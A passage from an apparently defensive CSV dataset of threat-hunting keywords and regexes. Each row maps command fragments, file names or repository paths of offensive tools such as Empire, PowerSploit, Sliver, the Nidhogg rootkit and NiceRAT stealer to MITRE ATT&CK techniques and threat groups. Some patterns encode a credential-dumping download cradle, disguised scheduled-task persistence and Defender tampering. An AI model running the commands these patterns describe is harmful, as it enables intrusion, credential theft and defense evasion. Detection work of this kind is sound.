T1059.001 - T1102.003","TA0011 - TA0010 - TA0005 - TA0003","PortStarter","Vice Society - Conti","C2","https://github.com/roadwy/DefenderYara/blob/9bbdb7f9fd3513ce30aa69cd1d88830e3cf596ca/Backdoor/Win64/PortStarter/Backdoor_Win64_PortStarter_B.yar#L8","1","0","N/A","N/A","10","10","395","63","2025-02-24T12:25:27Z","2024-02-05T13:57:05Z","53299" "*New-Object Net.WebClient).DownloadString* -DumpCreds*",".{0,1000}New\-Object\sNet\.WebClient\)\.DownloadString.{0,1000}\s\-DumpCreds.{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","0","N/A","N/A","10","4","355","309","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z","53301" "*New-Object System.Management.ManagementClass(""\\\$env:computername\root\cimv2*[""__CLASS""] = ""PMEClass""*",".{0,1000}New\-Object\sSystem\.Management\.ManagementClass\(\""\\\\\\\$env\:computername\\root\\cimv2.{0,1000}\[\""__CLASS\""\]\s\=\s\""PMEClass\"".{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","53302" "*new-operator --name * --lhost *",".{0,1000}new\-operator\s\-\-name\s.{0,1000}\s\-\-lhost\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","53304" "*New-PacketSMB2IoctlRequest*",".{0,1000}New\-PacketSMB2IoctlRequest.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. 
Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","FoxKitten","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","N/A","10","10","1569","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z","53305" "*New-PodeWebNavDropdown -Name *",".{0,1000}New\-PodeWebNavDropdown\s\-Name\s.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100 - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","N/A","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","53306" "*New-PSAmsiScanner -*",".{0,1000}New\-PSAmsiScanner\s\-.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","53307" "*New-PSDrive -Name T -PSProvider FileSystem -Root \\$IP\transfer *",".{0,1000}New\-PSDrive\s\-Name\sT\s\-PSProvider\sFileSystem\s\-Root\s\\\\\$IP\\transfer\s.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","53308" "*New-RoutingPacket*",".{0,1000}New\-RoutingPacket.{0,1000}","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1057","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","53309" "*New-ScheduledTaskTrigger -AtLogOn -User $env:username;Register-ScheduledTask -TaskName ""Microsoft XPS""*",".{0,1000}New\-ScheduledTaskTrigger\s\-AtLogOn\s\-User\s\$env\:username\;Register\-ScheduledTask\s\-TaskName\s\""Microsoft\sXPS\"".{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - 
TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","53310" "*New-UserPersistenceOption*",".{0,1000}New\-UserPersistenceOption.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 
Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Persistence.psm1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","53312" "*New-UserPersistenceOption*",".{0,1000}New\-UserPersistenceOption.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","53313" "*New-VolumeShadowCopy -Volume C:\*",".{0,1000}New\-VolumeShadowCopy\s\-Volume\sC\:\\.{0,1000}","offensive_tool_keyword","Powersploit","PowerSploit contains a PowerShell script which utilizes the volume shadow copy service to create a new volume that could be used for extraction of files","T1003 - T1103 - T1213","TA0006 - TA0009 - TA0010","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - 
Turla","Collection","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53314" "*New-VolumeShadowCopy*",".{0,1000}New\-VolumeShadowCopy.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","53315" "*New-WmiSession.ps1*",".{0,1000}New\-WmiSession\.ps1.{0,1000}","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/secabstraction/WmiSploit","1","1","N/A","N/A","N/A","2","164","34","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z","53316" "*nextnet.exe*",".{0,1000}nextnet\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 
- T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Black Basta","Framework","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","N/A","","N/A","","","","53317" "*nfxwi0lomv0gk21unfxgo3dfon0gs1th*",".{0,1000}nfxwi0lomv0gk21unfxgo3dfon0gs1th.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","N/A","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","53318" "*nginx/striker.log*",".{0,1000}nginx\/striker\.log.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","0","N/A","N/A","10","10","301","42","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z","53319" "*ngrok-stable-linux-arm.zip*",".{0,1000}ngrok\-stable\-linux\-arm\.zip.{0,1000}","offensive_tool_keyword","BackHAck","Backdoor Generator with C2 server - Linux & Windows - FUD AV .py .exe","T1090 - T1095 - T1008","TA0011","N/A","N/A","C2","https://github.com/AngelSecurityTeam/BackHAck","1","1","#linux","N/A","10","10","108","34","2020-03-25T21:30:47Z","2020-03-14T19:00:36Z","53324" "*-nh 127.0.0.1 -nP 7687 -nu neo4j -np *",".{0,1000}\-nh\s127\.0\.0\.1\s\-nP\s7687\s\-nu\sneo4j\s\-np\s.{0,1000}","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - TA0003","N/A","N/A","Credential 
Access","https://github.com/Hackndo/sprayhound","1","0","N/A","N/A","N/A","3","231","19","2024-12-31T08:09:37Z","2020-02-06T17:45:37Z","53325" "*nheiniger/SnaffPoint*",".{0,1000}nheiniger\/SnaffPoint.{0,1000}","offensive_tool_keyword","SnaffPoint","A tool for pointesters to find candies in SharePoint","T1210.001 - T1087.002 - T1059.006","TA0007 - TA0002 - TA0006","N/A","N/A","Discovery","https://github.com/nheiniger/SnaffPoint","1","0","N/A","N/A","7","3","254","25","2022-11-04T13:26:24Z","2022-08-25T13:16:06Z","53326" "*niam/noitcetorP-repmaT-ssapyB*",".{0,1000}niam\/noitcetorP\-repmaT\-ssapyB.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","53329" "*NiceRAT | * Stealer*",".{0,1000}NiceRAT\s\|\s.{0,1000}\s\sStealer.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","53331" "*NiceRAT-main.zip*",".{0,1000}NiceRAT\-main\.zip.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","1","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","53332" "*Nick Swink aka c0rnbread*",".{0,1000}Nick\sSwink\saka\sc0rnbread.{0,1000}","offensive_tool_keyword","SilentHound","Quietly 
enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/layer8secure/SilentHound","1","0","N/A","AD Enumeration","7","5","489","47","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z","53333" "*nickvourd/COM-Hunter*",".{0,1000}nickvourd\/COM\-Hunter.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistence tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","N/A","10","3","289","48","2025-03-11T04:49:55Z","2022-05-26T19:34:59Z","53334" "*nickvourd/Supernova*",".{0,1000}nickvourd\/Supernova.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tool","https://github.com/nickvourd/Supernova","1","1","N/A","N/A","10","9","829","151","2025-04-18T19:15:22Z","2023-08-08T11:30:34Z","53335" "*nickzer0/RagingRotator*",".{0,1000}nickzer0\/RagingRotator.{0,1000}","offensive_tool_keyword","RagingRotator","A tool for carrying out brute force attacks against Office 365 with built in IP rotation use AWS gateways.","T1110 - T1027 - T1071 - T1090 - T1621","TA0006 - TA0005 - TA0001","N/A","N/A","Credential Access","https://github.com/nickzer0/RagingRotator","1","1","N/A","N/A","10","1","79","7","2024-06-06T19:31:34Z","2023-09-01T15:19:38Z","53336" "*nicocha30/ligolo-ng*",".{0,1000}nicocha30\/ligolo\-ng.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","1","N/A","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","53337" "*Nidhogg rootkit*",".{0,1000}Nidhogg\srootkit.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit 
for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53338" "*Nidhogg*AntiAnalysis.hpp*",".{0,1000}Nidhogg.{0,1000}AntiAnalysis\.hpp.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53339" 
"*Nidhogg::AntiAnalysis::NidhoggDisableCallback*",".{0,1000}Nidhogg\:\:AntiAnalysis\:\:NidhoggDisableCallback.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53340" "*Nidhogg::AntiAnalysis::NidhoggEnableDisableEtwTi*",".{0,1000}Nidhogg\:\:AntiAnalysis\:\:NidhoggEnableDisableEtwTi.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - 
TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53341" "*Nidhogg::AntiAnalysis::NidhoggListObCallbacks*",".{0,1000}Nidhogg\:\:AntiAnalysis\:\:NidhoggListObCallbacks.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53342" "*Nidhogg::AntiAnalysis::NidhoggListPsRoutines*",".{0,1000}Nidhogg\:\:AntiAnalysis\:\:NidhoggListPsRoutines.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - 
T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53343" "*Nidhogg::AntiAnalysis::NidhoggListRegistryCallbacks*",".{0,1000}Nidhogg\:\:AntiAnalysis\:\:NidhoggListRegistryCallbacks.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","#content","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","53344" "*Nidhogg::AntiAnalysis::NidhoggRestoreCallback*",".{0,1000}Nidhogg\:\:AntiAnalysis\:\:NidhoggRestoreCallback.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - 
